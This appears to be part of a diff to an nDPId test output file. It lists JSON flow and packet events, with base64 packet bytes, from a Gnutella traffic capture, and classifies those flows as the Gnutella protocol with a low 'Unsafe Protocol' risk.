+00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtxAAIAGndcKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq5AAIAGH9QKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":72156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72156,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP1AAIAGOuoKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LVAAIAGCWcKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":72157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72157,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lyhAAIAGNGIKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72264,"flow_last_seen":72264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":72264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0alNAAIAGzs4KAAIPG16aNcRKGMq+PzReAAAAAIAC+vDiygAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72265,"flow_last_seen":72265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72265,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":72265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72265,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvdAAIAGYVQKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VqVAAIAG\/NQKAAIPe8ofccRMTThVM2MAAAAAAIAC+vADHQAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72266,"flow_last_seen":72266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72266,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":72266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72266,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00URAAIAGSiQKAAIPZ+hrZMRNqfSI7oMUAAAAAIAC+vAafwAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72267,"flow_last_seen":72267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":72267,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":72267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72267,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnJAAIAGzTgKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":72462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72462,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAs8AAEAGtlsbXpo1CgACDxjKxEoAfQABvj80X2AS\/\/8GQwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":72462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72462,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoalRAAIAGztkKAAIPG16aNcRKGMq+PzRfAH0AAlAQ+vAjDwAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":72471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72471,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtEAAEAG0LF7yh9xCgACD004xEwAfvQBVTNjAWAS\/\/8ykwAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":72472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72472,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoVqZAAIAG\/N8KAAIPe8ofccRMTThVM2MBAH70AlAQ+vBPXwAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":72595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72595,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtUAAEAGmJxn6GtkCgACD6n0xE0Af+4BiO6DFWAS\/\/9P9AAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":72596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72596,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo0UVAAIAGSi8KAAIPZ+hrZMRNqfSI7oMVAH\/uAlAQ+vBswAAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72848,"flow_last_seen":72848,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72848,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"170.254.19.6","src_port":28681,"dst_port":24180,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":72848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72848,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XAwAAIARFJoKAAIPqv4TBnAJXnQAIAcER05EED6qAQFUC1FLUlAGUk5BXS\/iNQlw"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72849,"flow_last_seen":72849,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72849,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.92.178.182","src_port":28681,"dst_port":57302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -438,102 +438,102 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":72853,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72853,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0JXgAAIARS7MKAAIPTcVvunAJGMoAIE0jR05EED66AQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72853,"flow_last_seen":72853,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72853,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"172.97.199.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":72853,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72853,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0s0kAAIARB\/EKAAIPrGHHDnAJGMoAIJcxR05EED67AQFUC1FLUlAGUk5BXS\/iNQlw"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":73064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73064,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpVAAIAGVgUKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYFAAIAGQkoKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTJAAIAGk6kKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KcdAAIAGHhcKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UWxAAIAGasIKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kNAAIAGdAYKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJtAAIAGiMQKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnBAAIAGeMAKAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A99AAIAG2\/MKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EFAAIAGLmIKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/FxAAIAGA84KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73300,"flow_last_seen":73300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73300,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":73300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73300,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+GxAAIAG6uoKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73301,"flow_last_seen":73301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73301,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 